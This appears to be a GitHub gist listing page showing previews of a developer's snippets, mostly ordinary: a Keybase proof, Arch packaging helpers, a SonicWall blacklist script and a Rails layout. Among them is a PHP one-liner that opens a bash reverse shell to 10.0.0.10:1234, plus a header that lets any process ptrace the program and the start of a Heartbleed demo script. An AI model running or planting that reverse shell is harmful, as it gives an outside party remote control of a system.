I hereby claim:
- I am rshipp on github.
- I am rshipp (https://keybase.io/rshipp) on keybase.
- I have a public key whose fingerprint is C1E4 46BF AC0D 6882 8EDD 98D1 9985 DAD9 D417 608D
To claim this, I am signing this object:
#!/bin/bash | |
# interactive betty shell | |
BETTYSH_PS1=${BETTYSH_PS1:-betty$ } | |
install_betty() { | |
echo "==> Installing betty..." | |
git clone https://github.com/pickhardt/betty ~/.betty || return $? | |
echo "==> Done." | |
} |
I hereby claim:
To claim this, I am signing this object:
#ifndef NOYAMA_H | |
#define NOYAMA_H | |
#include <sys/prctl.h> | |
prctl( PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0 ); | |
#endif |
#!/usr/bin/env python | |
from __future__ import with_statement | |
import datetime | |
from errno import EACCES | |
from os.path import realpath | |
from sys import argv, exit | |
from threading import Lock |
<?php | |
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
With pkgvars.py
in your PATH
, and a PKGBUILD
in your current directory,
run bash pkgvars.sh
. The output is formatted JSON.
A patch for Pacman (makepkg) and an updated Pacman PKGBUILD
are included,
along with an example working split PKGBUILD
and an example PKGBUILD with a custom array,
to show how custom arrays are not handled by this script.
oldsums=$(sed -n '/^.*sums=(.*/,/.*)/p' PKGBUILD); newsums=$(makepkg -g); sed -i "/^.*sums=(.*/,/.*)$/y/${oldsums/$'\n'/\\n}/${newsums/$'\n'/\\n}/" PKGBUILD |
# IP List to Address Group | |
# Convert a file with one IP on each line into a script that can be | |
# copy-pasted into a SonicWall shell to create a new address group. | |
# Use it like `./iplist2addressgroup.sh iplist.txt > script.txt`. | |
# I used it to bulk-blasklist some public IPs. | |
# See https://www.fuzeqna.com/sonicwallkb/ext/kbdetail.aspx?kbid=10896 | |
# Config | |
objname='blacklistedip' | |
groupname='Blacklist' |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title><%= content_for?(:title) ? "#{yield(:title)} - Default Site Name" : "Default Site Name" %></title> | |
</head> |
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) | |
# The author disclaims copyright to this source code. | |
import sys | |
import struct | |
import socket | |
import time | |
import select |